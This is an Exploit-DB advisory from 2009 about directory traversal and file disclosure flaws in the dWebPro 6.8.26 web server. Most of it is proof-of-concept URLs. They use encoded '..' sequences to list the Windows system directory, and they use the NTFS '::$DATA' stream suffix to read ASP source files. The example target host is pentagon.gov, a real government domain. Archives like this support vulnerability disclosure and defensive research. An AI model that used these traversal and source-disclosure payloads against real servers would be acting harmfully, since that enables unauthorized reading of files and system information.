dwebpro 6.8.26 dt/fd Multiple Vulnerabilities

2009-04-27T00:00:00
ID EDB-ID:8537
Type exploitdb
Reporter Alfons Luja
Modified 2009-04-27T00:00:00

Description

dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities. Remote exploit for windows platform

                                        
                                            ############################################
       dWebPro v 6.8.26
============================================
   Remote Directory Tarvelsal  && 
   Remote File Disclosure p0c's
============================================
   Download : http://www.dwebpro.com/downloads/dwebpro_6.8.26.exe
============================================
   Autor : Alfons Luja
   Tested on Win32 xp home 
############################################

   poc 1 Directory Travelsal : we can list directory
   
   http://www.penatgon.gov:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
   http://www.pentagon.gov:8080/..%2f..%2f..%2fWINDOWS%2f

   poc 2 File Disclosure : we can disclosure any file in a DOCUMENT_ROOT directory 
         by using Alternative Data Streams
   
   http://www.pentagon.gov:8080/..\/www/500-100-js.asp::$DATA
   http://www.pentagon.gov:8080/demos/aspclassic/asp_registry.asp::$DATA

+++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-04-27]